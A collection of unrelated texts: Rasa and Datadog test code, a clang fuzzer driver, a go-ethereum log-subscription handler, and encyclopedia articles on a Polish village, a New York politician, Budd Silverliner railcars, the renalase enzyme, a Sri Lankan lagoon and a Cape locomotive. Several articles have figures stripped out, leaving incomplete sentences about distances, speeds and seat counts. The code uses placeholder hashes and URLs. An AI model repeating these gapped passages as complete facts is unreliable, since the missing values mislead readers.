"CountVectorsFeaturizer",
"CRFEntityExtractor",
"DucklingEntityExtractor",
"DIETClassifier",
"ResponseSelector",
"EntitySynonymMapper",
),
),
(
"en",
as_pipeline(
{"name": "SpacyNLP", "model": "en_core_web_md"},
"SpacyTokenizer",
"SpacyFeaturizer",
"SpacyEntityExtractor",
"SklearnIntentClassifier",
),
),
(
"en",
as_pipeline(
{"name": "SpacyNLP", "model": "en_core_web_md"},
"SpacyTokenizer",
"SpacyFeaturizer",
"CountVectorsFeaturizer",
"LogisticRegressionClassifier",
),
),
(
"en",
as_pipeline(
"WhitespaceTokenizer", "LanguageModelFeaturizer", "DIETClassifier"
),
),
("fallback", as_pipeline("KeywordIntentClassifier", "FallbackClassifier")),
]
def pipelines_for_non_windows_tests() -> List[Tuple[Text, List[Dict[Text, Any]]]]:
# these templates really are just for testing
# because some of the components are not available on Windows, we specify pipelines
# containing them separately
# first is language followed by list of components
return [
(
"en",
as_pipeline(
{"name": "SpacyNLP", "model": "en_core_web_md"},
"SpacyTokenizer",
"SpacyFeaturizer",
"DIETClassifier",
),
),
(
"en",
as_pipeline(
"MitieNLP",
"MitieTokenizer",
"MitieFeaturizer",
"MitieIntentClassifier",
"RegexEntityExtractor",
),
),
(
"zh",
as_pipeline(
"MitieNLP", "JiebaTokenizer", "MitieFeaturizer", "MitieEntityExtractor"
),
),
]
def test_all_components_are_in_at_least_one_test_pipeline():
"""There is a template that includes all components to
test the train-persist-load-use cycle. Ensures that
really all components are in there.
"""
all_pipelines = pipelines_for_tests() + pipelines_for_non_windows_tests()
all_components = [c["name"] for _, p in all_pipelines for c in p]
all_registered_components = (
rasa.engine.recipes.default_components.DEFAULT_COMPONENTS
)
all_registered_nlu_components = [
c for c in all_registered_components if not issubclass(c, Policy)
]
for cls in all_registered_nlu_components:
if "convert" in cls.__name__.lower():
# TODO
# skip ConveRTFeaturizer as the ConveRT model is not
# publicly available anymore
# (see path_to_url
continue
assert (
cls.__name__ in all_components
), "`all_components` template is missing component."
@pytest.mark.timeout(600, func_only=True)
@pytest.mark.parametrize("language, pipeline", pipelines_for_tests())
@pytest.mark.skip_on_windows
async def test_train_persist_load_parse(
language: Optional[Text],
pipeline: List[Dict],
tmp_path: Path,
nlu_as_json_path: Text,
):
config_file = tmp_path / "config.yml"
rasa.shared.utils.io.dump_obj_as_json_to_file(
config_file,
{
"pipeline": pipeline,
"language": language,
"assistant_id": "placeholder_default",
},
)
persisted_path = rasa.model_training.train_nlu(
str(config_file), nlu_as_json_path, output=str(tmp_path)
)
assert Path(persisted_path).is_file()
agent = Agent.load(persisted_path)
assert agent.processor
assert agent.is_ready()
assert await agent.parse_message("Rasa is great!") is not None
@pytest.mark.timeout(600, func_only=True)
@pytest.mark.parametrize("language, pipeline", pipelines_for_non_windows_tests())
@pytest.mark.skip_on_windows
def test_train_persist_load_parse_non_windows(
language, pipeline, tmp_path, nlu_as_json_path: Text
):
test_train_persist_load_parse(language, pipeline, tmp_path, nlu_as_json_path)
def test_train_model_empty_pipeline(nlu_as_json_path: Text, tmp_path: Path):
config_file = tmp_path / "config.yml"
rasa.shared.utils.io.dump_obj_as_json_to_file(
config_file, {"pipeline": [], "assistant_id": "placeholder_default"}
)
with pytest.raises(ValueError):
rasa.model_training.train_nlu(
str(config_file), nlu_as_json_path, output=str(tmp_path)
)
def test_handles_pipeline_with_non_existing_component(
tmp_path: Path, pretrained_embeddings_spacy_config: Dict, nlu_as_json_path: Text
):
pretrained_embeddings_spacy_config["pipeline"].append(
{"name": "my_made_up_component"}
)
config_file = tmp_path / "config.yml"
rasa.shared.utils.io.dump_obj_as_json_to_file(
config_file, pretrained_embeddings_spacy_config
)
with pytest.raises(
Exception, match="Can't load class for name 'my_made_up_component'"
):
rasa.model_training.train_nlu(
str(config_file), nlu_as_json_path, output=str(tmp_path)
)
def test_train_model_training_data_persisted(
tmp_path: Path, nlu_as_json_path: Text, tmp_path_factory: TempPathFactory
):
config_file = tmp_path / "config.yml"
rasa.shared.utils.io.dump_obj_as_json_to_file(
config_file,
{
"pipeline": [{"name": "KeywordIntentClassifier"}],
"language": "en",
"assistant_id": "placeholder_default",
},
)
persisted_path = rasa.model_training.train_nlu(
str(config_file),
nlu_as_json_path,
output=str(tmp_path),
persist_nlu_training_data=True,
)
assert Path(persisted_path).is_file()
model_dir = tmp_path_factory.mktemp("loaded")
storage, _ = LocalModelStorage.from_model_archive(model_dir, Path(persisted_path))
nlu_data_dir = model_dir / "nlu_training_data_provider"
assert nlu_data_dir.is_dir()
assert not RasaYAMLReader().read(nlu_data_dir / "training_data.yml").is_empty()
def test_train_model_no_training_data_persisted(
tmp_path: Path, nlu_as_json_path: Text, tmp_path_factory: TempPathFactory
):
config_file = tmp_path / "config.yml"
rasa.shared.utils.io.dump_obj_as_json_to_file(
config_file,
{
"pipeline": [{"name": "KeywordIntentClassifier"}],
"language": "en",
"assistant_id": "placeholder_default",
},
)
persisted_path = rasa.model_training.train_nlu(
str(config_file),
nlu_as_json_path,
output=str(tmp_path),
persist_nlu_training_data=False,
)
assert Path(persisted_path).is_file()
model_dir = tmp_path_factory.mktemp("loaded")
storage, _ = LocalModelStorage.from_model_archive(model_dir, Path(persisted_path))
nlu_data_dir = model_dir / "nlu_training_data_provider"
assert not nlu_data_dir.is_dir()
```
|
```go
// Unless explicitly stated otherwise all files in this repository are licensed
// This product includes software developed at Datadog (path_to_url
package uptane
import (
"encoding/json"
"testing"
"github.com/stretchr/testify/assert"
"go.etcd.io/bbolt"
"github.com/DataDog/datadog-agent/pkg/config/remote/meta"
)
func getTestDB(t *testing.T) *bbolt.DB {
dir := t.TempDir()
db, err := bbolt.Open(dir+"/remote-config.db", 0600, &bbolt.Options{})
if err != nil {
panic(err)
}
t.Cleanup(func() {
db.Close()
})
return db
}
func TestLocalStore(t *testing.T) {
db := getTestDB(t)
embededRoots := map[uint64]meta.EmbeddedRoot{
1: []byte(`{"signatures":[{"keyid":your_sha256_hash,"sig":your_sha256_hashyour_sha256_hash},{"keyid":your_sha256_hash,"sig":your_sha256_hashyour_sha256_hash}],"signed":{"_type":"root","consistent_snapshot":true,"expires":"1970-01-01T00:00:00Z","keys":{your_sha256_hash:{"keyid_hash_algorithms":["sha256","sha512"],"keytype":"ed25519","keyval":{"public":your_sha256_hash},"scheme":"ed25519"},your_sha256_hash:{"keyid_hash_algorithms":["sha256","sha512"],"keytype":"ed25519","keyval":{"public":your_sha256_hash},"scheme":"ed25519"}},"roles":{"root":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2},"snapshot":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2},"targets":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2},"timestamp":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2}},"spec_version":"1.0","version":1}}`),
2: []byte(`{"signatures":[{"keyid":"key","sig":"sig2"},{"keyid":your_sha256_hash,"sig":your_sha256_hashyour_sha256_hash}],"signed":{"_type":"root","consistent_snapshot":true,"expires":"1970-01-01T00:00:00Z","keys":{your_sha256_hash:{"keyid_hash_algorithms":["sha256","sha512"],"keytype":"ed25519","keyval":{"public":your_sha256_hash},"scheme":"ed25519"},your_sha256_hash:{"keyid_hash_algorithms":["sha256","sha512"],"keytype":"ed25519","keyval":{"public":your_sha256_hash},"scheme":"ed25519"}},"roles":{"root":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2},"snapshot":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2},"targets":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2},"timestamp":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2}},"spec_version":"1.0","version":2}}`),
}
transactionalStore := newTransactionalStore(db)
store, err := newLocalStore(transactionalStore, "test", embededRoots)
assert.NoError(t, err)
storeRoot1 := json.RawMessage(embededRoots[1])
storeRoot2 := json.RawMessage(embededRoots[2])
rootVersion, err := store.GetMetaVersion("root.json")
assert.NoError(t, err)
assert.Equal(t, uint64(2), rootVersion)
metas, err := store.GetMeta()
assert.NoError(t, err)
assert.Equal(t, map[string]json.RawMessage{
"root.json": storeRoot2,
}, metas)
storeTimestamp5 := json.RawMessage(`{"signatures":[],"signed":{"_type":"timestamp","version":5}}`)
err = store.SetMeta("timestamp.json", storeTimestamp5)
assert.NoError(t, err)
metas, err = store.GetMeta()
assert.NoError(t, err)
assert.Equal(t, map[string]json.RawMessage{
"root.json": storeRoot2,
"timestamp.json": storeTimestamp5,
}, metas)
storeSnapshot6 := json.RawMessage(`{"signatures":[],"signed":{"_type":"snapshot","version":6}}`)
err = store.SetMeta("snapshot.json", storeSnapshot6)
assert.NoError(t, err)
metas, err = store.GetMeta()
assert.NoError(t, err)
assert.Equal(t, map[string]json.RawMessage{
"root.json": storeRoot2,
"timestamp.json": storeTimestamp5,
"snapshot.json": storeSnapshot6,
}, metas)
storeTargets7 := json.RawMessage(`{"signatures":[],"signed":{"_type":"targets","version":7}}`)
err = store.SetMeta("targets.json", storeTargets7)
assert.NoError(t, err)
metas, err = store.GetMeta()
assert.NoError(t, err)
assert.Equal(t, map[string]json.RawMessage{
"root.json": storeRoot2,
"timestamp.json": storeTimestamp5,
"snapshot.json": storeSnapshot6,
"targets.json": storeTargets7,
}, metas)
storeRoot3 := `{"signatures":[{"keyid":your_sha256_hash,"sig":your_sha256_hashyour_sha256_hash},{"keyid":your_sha256_hash,"sig":your_sha256_hashyour_sha256_hash}],"signed":{"_type":"root","consistent_snapshot":true,"expires":"1970-01-01T00:00:00Z","keys":{your_sha256_hash:{"keyid_hash_algorithms":["sha256","sha512"],"keytype":"ed25519","keyval":{"public":your_sha256_hash},"scheme":"ed25519"},your_sha256_hash:{"keyid_hash_algorithms":["sha256","sha512"],"keytype":"ed25519","keyval":{"public":your_sha256_hash},"scheme":"ed25519"}},"roles":{"root":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2},"snapshot":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2},"targets":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2},"timestamp":{"keyids":[your_sha256_hash,your_sha256_hash],"threshold":2}},"spec_version":"1.0","version":3}}`
err = store.SetMeta("root.json", json.RawMessage(storeRoot3))
assert.NoError(t, err)
rootVersion, err = store.GetMetaVersion("root.json")
assert.NoError(t, err)
assert.Equal(t, uint64(3), rootVersion)
metas, err = store.GetMeta()
assert.NoError(t, err)
assert.Equal(t, map[string]json.RawMessage{
"root.json": json.RawMessage(storeRoot3),
"timestamp.json": storeTimestamp5,
"snapshot.json": storeSnapshot6,
"targets.json": storeTargets7,
}, metas)
err = store.DeleteMeta("timestamp.json")
assert.NoError(t, err)
metas, err = store.GetMeta()
assert.NoError(t, err)
assert.Equal(t, map[string]json.RawMessage{
"root.json": json.RawMessage(storeRoot3),
"snapshot.json": storeSnapshot6,
"targets.json": storeTargets7,
}, metas)
root1, found, err := store.GetRoot(1)
assert.NoError(t, err)
assert.True(t, found)
assert.Equal(t, []byte(storeRoot1), root1)
root2, found, err := store.GetRoot(2)
assert.NoError(t, err)
assert.True(t, found)
assert.Equal(t, []byte(storeRoot2), root2)
root3, found, err := store.GetRoot(3)
assert.NoError(t, err)
assert.True(t, found)
assert.Equal(t, []byte(storeRoot3), root3)
_, found, err = store.GetRoot(4)
assert.NoError(t, err)
assert.False(t, found)
}
```
|
Gubity (German Gubitten) is a village in the administrative district of Gmina Morąg, within Ostróda County, Warmian-Masurian Voivodeship, in northern Poland. It lies approximately south-east of Morąg, north of Ostróda, and west of the regional capital Olsztyn.
References
Gubity
|
Henry Fitzhugh (August 7, 1801 "The Hive", Washington County, Maryland – August 11, 1866) was an American merchant, businessman and politician from New York.
Life
He was the son of Col. William Fitzhugh, Jr. (1761–1839, one of the founders of Rochester, New York) and Ann (Hughes) Fitzhugh (1771–1829). Baptised and raised in Saint John's Parish, Henry removed with the Fitzhugh family at the age of 15 to a tract of the Phelps and Gorham Purchase in 1816. On December 11, 1827, Henry married Elizabeth Barbara Carroll (1806–1866, sister of Charles H. Carroll) at Groveland, New York.
He was a member of the New York State Assembly (Oswego Co.) in 1849. He was a Canal Commissioner from 1852 to 1857, elected on the Whig ticket in the New York state election, 1851 and New York state election, 1854.
He was buried at the Williamsburg Cemetery in Groveland, NY.
U.S. presidential candidates James G. Birney and Gerrit Smith, and State Senator Frederick F. Backus (1794–1858), were his brothers-in-law.
Sources
Official State Canvass, in NYT on January 1, 1852
The Charges against Henry Fitzhugh, in NYT on April 4, 1853
Whig Convention, in NYT on September 21, 1854, nominating Fitzhugh for re-election
The New York Civil List compiled by Franklin Benjamin Hough (pages 42, 237 and 273; Weed, Parsons and Co., 1858)
Fitzhugh genealogy in Upstate Arcadia: Landscape, Aesthetics, and the Triumph of Social Differentiation in America by Peter J. Hugill (Rowman & Littlefield, 1995, , ; page 50)
Political Graveyard
Transcriptions from Gravestones, at RootsWeb
Fitzhugh genealogy
1801 births
1866 deaths
People from Groveland, New York
Erie Canal Commissioners
Members of the New York State Assembly
People from Washington County, Maryland
New York (state) Whigs
19th-century American politicians
Carroll family
|
The Budd Silverliner was a model of electric multiple unit railcar designed and built by the Budd Company with 59 examples being delivered starting in 1963. Fifty-five of the cars were purchased for the Reading and Pennsylvania Railroads with public funds for use in Philadelphia, Pennsylvania, area commuter rail service with the remaining 4 cars being purchased by USDOT for use in high-speed rail experiments in 1965. Based on a series of 6 prototype Pioneer III cars built in 1958, the Silverliners represented the first production order of "modern" commuter MU equipment purchased by either railroad and earned their name from their unpainted stainless steel construction which contrasted with the painted carbon steel bodies of the pre-war MU fleets. The cars became a fixture of SEPTA Regional Rail service providing the name to their entire series of EMU railcars before finally being retired in 2012 after 49 years in service.
History
In 1963 the financial condition of the Pennsylvania and Reading Railroads was such that neither was able to upgrade their money-losing commuter operations on their own. As a result, state and local government stepped in to purchase new cars that would be in turn used by the private railroads to run the required commuter operations through an entity known as the Passenger Service Improvement Corporation. The new cars would be a production order based on 6 1958 Pioneer III type cars with improvements based on the lessons learned from the earlier design. A total of 38 cars were purchased for the PRR with the remaining 17 going to the Reading. While some referred to the new vehicles as "PSIC Cars", the modern stainless steel body shells quickly defined the fleet and the name "Silverliner" was soon adopted. In addition to their looks, the cars introduced many other modern innovations to the Philadelphia commuter rail network, including air conditioning, greater interior space ( longer than the PRR MP54) seating up to 127 persons, high acceleration with a greater top speed and near silent operation.
The 38 PRR cars were numbered in two series, 201-219 and 250-269 and given PRR classification MP85B and MP85C respectively, while the 17 Reading cars were numbered 9001-9017 and given Reading classification REB-13. With the delivery of the second set of "Silverliners" in 1967, the original Budd Silverliners were renamed "Silverliner II" with the Pioneer III cars becoming Silverliner I. In 1968 the Pennsylvania Railroad was merged into the new Penn Central and although funding for the commuter rail services were being provided by the newly formed SEPTA, from 1963 until the formation of Conrail in 1976, the Silverliners were operated by and wore the livery of their respective railroads, the PRR Keystone being replaced by the Penn Central "Worms" after the merger and the Reading diamond throughout. After 1976 the service continued to be operated under Conrail, but the cars were fully branded as SEPTA and would operate as such until the end of their careers.
In late 1984 the Center City Commuter Connection opened allowing the Reading and PRR cars to mix and roam about either "side" of the system. In 1989 the entire fleet was sent to the Morrison-Knudsen plant in Hornell, New York, for a mid-life overhaul. In addition to this all of the cars eventually received upgrades to their propulsion system to increase reliability and remove PCBs from their transformers, upgraded HVAC systems to eliminate CFCs. In the 1990s the cars received SEPTA's standard full length Red and Blue window decal wrapping and some of the cars had a minor interior upgrade with the original "ketchup and mustard" seats being converted to a padded brown leather appearance. By 2000 the cars' age was becoming apparent with decreasing reliability and lack of ADA compliance which included the manually operated doors which were becoming a hindrance at SEPTA's increasing number of stations equipped with high level platforms. However design delays and a contract bidding dispute delayed the order of their 120 replacement Silverliner V cars until past 2005 and then problems with the builder, Hyundai Rotem, setting up a production facility in South Philadelphia, further delayed deliveries until 2010. During this period an increasing number of Silverliner II cars began to be sidelined with serious mechanical problems with a few even catching fire in service. Due to the lack of a public address system the Silverliner IIs were operating under an ADA waiver set to expire on July 1, 2012, and with deliveries of Silverliner V cars accelerating SEPTA began to retire cars as their FRA 92-day inspections ran out. By May 2012 most Silverliner IIs had been retired and in their final week of service the last operating Silverliner II, #9010, was sent to run on the Cynwyd Line with the final run taking place on June 29. One car survives, however, whereabouts and preservation are unknown.
Design
The design of the Budd Silverliner was based on a lightweight stainless steel body and frame coupled to an advanced AC/DC rectifier propulsion system and new lightweight, high-speed trucks. While largely identical to the earlier Pioneer IIIs, differences included a single-arm Faiveley pantograph, a state-of-the-art propulsion system that made use of solid-state phase angle controllers coupled to mercury arc ignitron rectifiers, higher-powered motors, a higher-capacity main transformer, multi-function couplers and disc brakes. One result of these upgrades was that the Silverliners were incompatible with the six Pioneer prototypes. Passenger amenities were also identical to the Pioneer III cars offering riders air cushion suspension, air conditioning, electric train heat and a nearly silent acceleration and braking. With more than the Pioneer III cars ( total), the Silverliners could achieve a acceleration rate, which was far higher than the older MP54s and a top speed of compared with the of the MP54 fleet (which was not often reached in service). Inside, the cars were equipped with 25 rows of 3+2 reversible (flipover) bench seating with 124 usable seats and either a bathroom or an additional 3-person bench seat. The seats were initially furnished in a dark gray diamond-patterned foam rubber "plush", which began to wear out by the mid-1970s. Four cars (#259, #269, #9012 and #9015) were experimentally retrofitted with brown vinyl leatherette seats. However, the balance of the fleet was redone in the SEPTA/Conrail era with canvas-textured padded covering in a so-called "Ketchup and Mustard" theme, with the three-person seats upholstered in mustard yellow and the two-person seats done in a dark ketchup red.
Despite both Reading and PRR cars being paid for in part by the PSIC, each railroad was allowed to put their own stamp on the design. These differences included the PRR units being fitted with only one overhead luggage rack, a bar pilot, a metal-framed engineer's window and position-light cab signals, with the Reading cars being fitted with a cowcatcher, twin overhead luggage racks, and color light (though PRR-compatible) cab signals; the latter were removed after the RDG discontinued its 1928 cab signal installation on the Bethlehem Branch between Jenkintown and Lansdale in 1967, and 9001–9017 would have to be re-equipped with cab signal equipment in 1983–84 in preparation for operation through the Center City Commuter Connection and former PRR lines. The first group of PRR cars (201–219) were intended by be used on longer distance runs to places like Harrisburg, PA and New York City and were equipped with a bathroom on the "F" end to facilitate this. The second set of PRR cars, along with all of the Reading cars, were not equipped with comfort facilities, substituting a 3-person bench seat is its place. While all of the Silverliner cars were delivered with disc brakes, the PRR disliked this feature as it required trains to be placed over a drop pit for routine brake work, and all of their 38 cars were converted to conventional tread brakes by 1968. The Reading cars were not converted to tread braking until rebuilding in the SEPTA era in 1989. In addition to the disc brakes, all classes of Budd Silverliner were delivered with an early multi-function coupler design that consisted of an AAR "tightlock" knuckle coupler mounted above a separate automatic coupler for air and electrical connections. This design allowed the new MU cars to be attached (in emergencies or planned shop moves) for towing behind locomotives, conventional passenger and heavyweight MU cars, or in freight trains; the outer ends of the stepboxes were lettered with detailed instructions to train crews for doing so. However, the newer fleet of 232 Silverliner IVs were delivered with Budd's new "pin and cup" coupler and both the Silverliner II and III fleets were modified to both couple to and MU with the IVs, as opposed to the older cars the IVs were replacing. When this change was carried out the Penn Central fitted its cars with a welded bar pilot to protect the leading wheels from debris impact. All cars were equipped with WABCO AA2 horns.
Notable cars and incidents
No. 210 – Destroyed by electrical fire in Suburban Station in 1974.
No. 218 – Had sheet metal cover partly removed from one of its letterboards revealing the 'LVANIA' portion of the original PENNSYLVANIA road name.
No. 257 – Severely damaged by a heater fire while in service at Overbrook on November 4, 2009. Car remained stored outdoors at Overbrook Shops into mid-2010s as evidence in lawsuit stemming from fire; eventually scrapped.
No. 265 – Retired after involvement in rear-end collision on the West Chester Branch on October 16, 1979.
No. 266 – Converted to serve double duty as an overhead wire inspection "camera" car.
No. 269 – Restored for the 25th anniversary of the Pennsylvania Railroad Technical & Historical Society and the 50th anniversary of the National Railway Historical Society to near-original PRR appearance with existing PENNSYLVANIA letterboards on both sides and re-applied PRR keystone decals on each cab end. Keystones were stolen shortly after the car went back into service.
Experimental Silverliners
As part of the High Speed Ground Transportation Act of 1965 the United States Department of Transportation placed an order for 4 additional Silverliners for use as test vehicles to explore the feasibility of a high-speed rail line in the United States. Numbered T-1 through T-4, the cars were modified for operation up to speeds of 150 mph and were outfitted with various instrumentation to document the effects of rail travel at such speeds including CCTV cameras to monitor the wheels and pantograph. The most visible change was a slightly streamlined slab end applied to the T-1 car to reduce drag at high speed after the 4-car trainset was unable to reach the speed target with the stock end. With the new streamlining in place the train was able to reach a top speed of on the straight track between Trenton and New Brunswick, New Jersey. As a result, this same level of deflection was applied to the front ends of the production high-speed MU Budd Metroliners. During the tests the cars were based at the PRR's Morrisville Yard engine facility, and after the tests were completed at least one of the cars was de-powered and used as a USDOT rail testing vehicle for some years afterward, and one was used by the U.S. Army at Fort Eustis.
T-1 was purchased by a private buyer in 2015 and moved to the South Carolina Railway Museum, to be converted into a lounge car. T-2 exists as an office for the AAFES warehouse in Lee Hall, VA. T-3 and T-4 are presumed scrapped, but T-4 is unaccounted for. Its whereabouts are unknown.
See also
Budd Metroliner
M1 (railcar)
Silverliner
SEPTA Regional Rail
References
Budd multiple units
Electric multiple units of the United States
SEPTA Regional Rail
Passenger rail transportation in Pennsylvania
|
Renalase, FAD-dependent amine oxidase is an enzyme that in humans is encoded by the RNLS gene. Renalase is a flavin adenine dinucleotide-dependent amine oxidase that is secreted into the blood from the kidney.
Structure
Gene
The gene encoding this protein is called RNLS (also known as C10orf59 or FLJ11218). The renalase gene has 9 exons spanning approximately 311,000 bp and resides on chromosome 10 at q23.33.
Protein
The renalase protein consists of a putative secretory signal peptide (SignalP score of 0.4), a flavin adenine dinucleotide (FAD)-binding region, and an oxidase domain. At least four alternative splicing isoforms have been identified in humans (hRenalase1 to hRenalase4). Only hRenalase1 is detected in human blood samples, which means that hRenalase2 to 4 probably have different functions than hRenalase1.
Analysis of the primary structure of renalase shows that it is an FAD-dependent oxidase. The X-ray crystal structure of hRenalase1 reveals structural similarity between renalase and p-hydroxybenzoate hydroxylase.
Function
Renalase has been claimed to degrade catecholamines like adrenaline (epinephrine) and noradrenaline (norepinephrine) in the blood circulation.
Dr. Gary Desir's laboratory at Yale School of Medicine discovered and named renalase in 2005 suggest that the human kidney releases this protein into the bloodstream to regulate blood pressure (in addition to other possible, as yet undiscovered, functions).
Whether renalase actually oxidizes catecholamine substrates has been widely disputed. The primary evidence for catecholamine oxidation is the detection of H2O2, however catecholamines emanate H2O2 in the presence of O2 in a natural decomposition reaction. In 2013, renalase was claimed to oxidize α-NADH (the normal form of NADH is the β anomer) to β-NAD, with concomitant reduction of O2 (dioxygen) to H2O2 (hydrogen peroxide). This reaction was proposed to repair aberrant NADH and NADPH forms that are not accepted as cofactors by most nicotinamide-dependent oxidoreductase enzymes.
It transpired that α-NAD(P)H molecules are not substrates for renalase; instead 6-dihydroNAD (6DHNAD) was identified as the substrate, a molecule with highly similar spectrophotometric characteristics and equilibrium concentrations as those reported for α-NAD(P)H. 6DHNAD is an isomeric form of β-NADH that carries the hydride in the 6-position of the nicotinamide base as opposed to the metabolically active 4-position. This form of NAD is one of three products that are formed from non-enzymatic reduction of β-NAD in addition to 4-dihydroNAD (β-NADH), 2-dihydroNAD (2DHNAD). Both 2DHNAD and 6DHNAD were shown to be substrates for renalase. These molecules react rapidly to reduce the enzyme's flavin cofactor forming β-NAD. The renalase flavin then delivers the electrons harvested to O2 (dioxygen) forming H2O2 (hydrogen peroxide), completing the catalytic cycle. It was shown that both 6DHNAD and 2DHNAD are tight binding inhibitors of specific primary metabolism dehydrogenases, thereby defining a clear metabolic function for renalase in the alleviation of this inhibition.
Extracellular renalase functions as a survival and growth factor, independent of its enzymatic activity. Either naturally folded renalase or a 20 amino acid renalase peptide can activate the phosphoinositide 3-kinase (PI3K)and the mitogen-activated protein kinase (MAPK) pathways in a manner that protects cells against apoptosis.
Catalysis
Renalase isolated in native form, that is, without refolding steps, catalyzes the oxidation of 6DHNAD(P) or 2DHNAD(P), the isomeric forms of β-NAD(P)H . In contrast to clear evidence for catalysis of this activity, the native renalase used in these experiments did not catalyze the conversion of the catecholamine epinephrine to adrenochrome.
Renalase is secreted in plasma, and functions as an anti-apoptotic survival factor. The Plasma membrane Ca2+ ATPase PMCA4b is a putative receptor for extracellular renalase. The binding of renalase to PMCA4b stimulates calcium efflux with subsequent activation of the PI3K and MAPK pathways, increased expression of the anti-apoptotic factor Bcl-2, and decreased caspase3-mediated apoptosis. Administration of recombinant renalase protects against acute kidney injury (AKI), and against cardiac ischemia in animal models.
Clinical significance
Renalase levels are markedly reduced in patients with severe chronic kidney disease (end-stage renal disease, ESRD). Since hormones like erythropoietin are secreted less in ESRD, renalase may also be a kidney hormone, although it is also expressed in heart muscle, skeletal muscle and liver cells in humans, and in mouse testicles.
Renalase has been controversially proposed to degrade catecholamines, which are hormones involved in the acute stress (fight-or-flight) response. Injection of renalase in rodents transiently decreases blood pressure, heart rate, heart muscle contractility, and blood vessel resistance. Under normal conditions, renalase is present but inactive in the bloodstream. When catecholamines are released into the bloodstream however, renalase activity increases about tenfold within 30 seconds, and remains high for an hour or longer. Activation of circulating renalase is probably responsible for early activation, while secretion into the bloodstream occurs after 15 minutes.
polymorphisms in the renalase gene is a risk factor for essential hypertension.
Single nucleotide polymorphisms in the renalase gene are associated with type 1 diabetes. A genome-wide association study and meta-analysis found that approximately 42 loci affect the risk of diabetes The data confirmed linkage with most of the 24 previously identified loci, and identified 27 novel loci. The strongest evidence of association among these novel regions was achieved for the renalase gene.
Animal studies
In mice, hearts exposed to oxygen shortage (ischemia), myocardial infarction size was decreased and heart function better preserved when renalase was administered. Renalase knock-out mice are also more sensitive to damage to the heart muscle. Renalase expression in the heart is also decreased in the rat model of end-stage renal disease. The scientists who discovered renalase believe that it might explain some of the susceptibility to heart disease among patients with chronic kidney disease.
Using small inhibitory RNAs or knock-out mice, the consequences of loss of renalase function have been studied. These include raised blood pressure (hypertension), increased heart rate (tachycardia), increased blood vessel resistance (vasoconstriction) and an increased catecholamine response.
In a rat model of chronic kidney disease (in which 85% of kidney tissue is surgically removed), renalase deficiency and defective renalase activation develops 2–3 weeks after surgery.
Interactions
Renalase has been shown to interact with PMCA4b.
References
Genes on human chromosome 10
EC 1.6.3
|
Mundal Lagoon (,, Muntal) is a lagoon in Puttalam District, western Sri Lanka. The lagoon is sometimes referred to as Mundal Lake.
The lagoon is linked to Puttalam Lagoon to the north by a channel. The lagoon's water is brackish.
The lagoon is surrounded by a region containing rice paddies, coconut plantations and scrubland. The land is used for prawn fishing and rice cultivation.
The lagoon has mangrove swamps, salt marshes and sea grasses. The lagoon attracts a wide variety of water birds including herons, egrets, terns and other shorebirds.
References
Salt and Water Balance in the Mundel Lake, H.B. JAY ASIRI / J.K. RAJAP AKSHA (Jan 01, 2022)
Bodies of water of Puttalam District
Lagoons of Sri Lanka
|
```c++
//==-- loop_proto_to_cxx_main.cpp - Driver for protobuf-C++ conversion -----==//
//
// See path_to_url for license information.
//
//===your_sha256_hash------===//
//
// Implements a simple driver to print a C++ program from a protobuf with loops.
//
//===your_sha256_hash------===//
#include <fstream>
#include <iostream>
#include <streambuf>
#include <string>
#include "proto_to_cxx.h"
int main(int argc, char **argv) {
for (int i = 1; i < argc; i++) {
std::fstream in(argv[i]);
std::string str((std::istreambuf_iterator<char>(in)),
std::istreambuf_iterator<char>());
std::cout << "// " << argv[i] << std::endl;
std::cout << clang_fuzzer::LoopProtoToCxx(
reinterpret_cast<const uint8_t *>(str.data()), str.size());
}
}
```
|
```go
package extension
import (
"github.com/ethereum/go-ethereum"
"github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/ethclient"
"github.com/ethereum/go-ethereum/log"
"github.com/ethereum/go-ethereum/node"
"github.com/ethereum/go-ethereum/private"
)
type subscriptionHandler struct {
facade ManagementContractFacade
client Client
service *PrivacyService
}
func NewSubscriptionHandler(node *node.Node, psi types.PrivateStateIdentifier, ptm private.PrivateTransactionManager, service *PrivacyService) *subscriptionHandler {
rpcClient, err := node.AttachWithPSI(psi)
if err != nil {
panic("extension: could not connect to ethereum client rpc")
}
client := ethclient.NewClientWithPTM(rpcClient, ptm)
return &subscriptionHandler{
facade: NewManagementContractFacade(client),
client: NewInProcessClient(client),
service: service,
}
}
func (handler *subscriptionHandler) createSub(query ethereum.FilterQuery, logHandlerCb func(types.Log)) error {
incomingLogs, subscription, err := handler.client.SubscribeToLogs(query)
if err != nil {
return err
}
go func() {
stopChan, stopSubscription := handler.service.subscribeStopEvent()
defer stopSubscription.Unsubscribe()
for {
select {
case err := <-subscription.Err():
log.Error("Contract extension watcher subscription error", "error", err)
break
case foundLog := <-incomingLogs:
logHandlerCb(foundLog)
case <-stopChan:
return
}
}
}()
return nil
}
```
|
The Cape Government Railways 4th Class 4-6-0TT of 1882 was a South African steam locomotive from the pre-Union era in the Cape of Good Hope.
In 1882 and 1883, the Cape Government Railways placed sixty-eight tank-and-tender locomotives in mainline service on all three its Systems. It was an improved version of the 4th Class locomotives of 1880 and 1881 and was delivered in two versions, built by two manufacturers.
Thirty-three of these locomotives were built by Robert Stephenson and Company, with Stephenson valve gear. Twelve of them were still in service when the South African Railways was established in 1912, including three which had been sold to the Kowie Railway.
Manufacturers
The 4th Class 4-6-0TT tank-and-tender locomotive of 1880 had been designed by Michael Stephens, at that stage the Locomotive Superintendent of the Western System of the Cape Government Railways (CGR) in Cape Town. This improved version was delivered to the CGR in 1882 and 1883. The contracts for their construction were divided between Robert Stephenson and Company and Neilson and Company. Neilson's built thirty-five locomotives with Joy valve gear.
